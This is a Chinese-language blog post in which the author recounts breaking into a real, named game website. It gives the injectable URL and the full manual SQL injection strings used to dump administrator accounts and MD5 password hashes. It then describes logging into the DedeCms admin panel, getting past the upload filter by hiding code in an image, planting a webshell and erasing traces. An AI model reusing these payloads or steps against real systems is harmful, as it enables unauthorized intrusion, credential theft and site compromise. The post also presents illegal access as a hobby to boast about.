Mop游戏的一次入侵
来源:小帅
某天,我和bloodsword大牛在玩,遇到了个mop注射点,起于好奇心的诱惑,溜达之,发现遇到了很多的困难。谁知今天又看到了那个站,于是乎就想写写什么,因为上次遇到的问题真的太多了,写啊写不完。最近五一放假,相对来说有点时间,于是想抄起武器再溜达次,顺便把过程给写写。
首先是一个游戏的站。隶属于mop的,是大话西游的官方地址。上面有许多的下载文件。
如图1
注入点为:http://www.zg.mop.com/service/sales.php?newsId=1178,于是开始注射,我比较喜欢手动的,因为我喜欢看到那个熟悉的MD5页面,于是开始手动注射,
判断长度:http://www.zg.mop.com/service/sales.php?newsId=1178 order by 25/*,
发现返回错误,http://www.zg.mop.com/service/sales.php?newsId=1178 order by 24/*返回正常,那么就是24个长度了,
http://www.zg.mop.com/service/sales.php?newsId=1178 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*
发现返回如图
于是开始把“12”、“13”2出用列来代替,随便想了个admin表,想了个userid,构造http://www.zg.mop.com/service/sales.php?newsId=1178 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,userid,14,15,16,17,18,19,20,21,22,23,24 from admin/*
结果返回如图
最后猜到了一些信息,发现权限不是root的,也就是一个一般的账号,看来load_file这个路已经没戏了,换路。继续构造:
http://www.zg.mop.com/service/sa ... 0union%20select%201,2,3,4,5,6,7,8,9,10,11,pwd,userid,14,15,16,17,18,19,20,21,22,23,24%20from%20admin/*爆出了个MD5,发现这个MD5无法破解,真郁闷,难道就这么死了?!不行!继续找管理级的账号,
于是用limit,构造语句http://www.zg.mop.com/service/sa ... 0union%20select%201,2,3,4,5,6,7,8,9,10,11,pwd,userid,14,15,16,17,18,19,20,21,22,23,24%20from%20admin limit1,1,读出第2条记录,
于是跑出了账号密码,32位加密的MD5,接着开始找后台,郁闷的是,找后台并不是想的那么简单的!啊D,明小子什么的扫了很久也没扫出什么花样,最后还是bloodsword大牛的注射工具比较强大,字典真厚,扫出了个setup目录,登录一看,吓到我了,原来是织梦的系统……这下,嘿嘿,后台等于拿到手了。如图
就是喜欢看到“Power by DedeCms 织梦内容管理系统”这几个字,于是去down了份织梦的系统,顺利的找到了后台地址,并且登陆,如图
这下比较不错了,嘿嘿,还能做点事了,看了下这个版本并不是很高,就试了下上传的办法,下载了个angel的spy2008来看看,很是郁闷,无论上传什么东西都无法进去,记得我们上次进去的时候是通过一个老外的软件,加了层马甲(把字符写入图片的工具)这样才混过检查的,于是厚着脸皮又一次的问bloodsword大牛要了份来,也成功的混过去了,大家觉得我们上传木马很简单一样的,其实其中的辛苦又谁知道呢!当一次次的挫折,一次次的错误提示,咱也害怕,害怕离成功只有那么一步,你却不知道。最后东西的确上传上去了,回显也不是404,上次是显示404
不知道为什么,可能是加了一般的马甲混不过去,手动加上文件头欺骗不成功,返回404错误,加了那工具后就成功了。如图
嘿嘿,这个是图片服务端了,就是怕gpc会影响到一句话的解析,所以采用了这个方式,只要回显并不是上面的那个404错误就行,用客户端连上去,传个马,擦下屁股一切ok了,
上次就是差不多这么拿到的,后来仔细一看发现这个服务器真老了。很多牛X同学都来过了,通过痕迹可以看出他们还成功提权上去了的,都是root的权限,就小菜我,连linux也不懂,自己的shell还只是nobody的权限,悲哀……这个文章就为我的无知纪念下吧,因为学习都是有进步的。
姓名:Chinadu
近期评论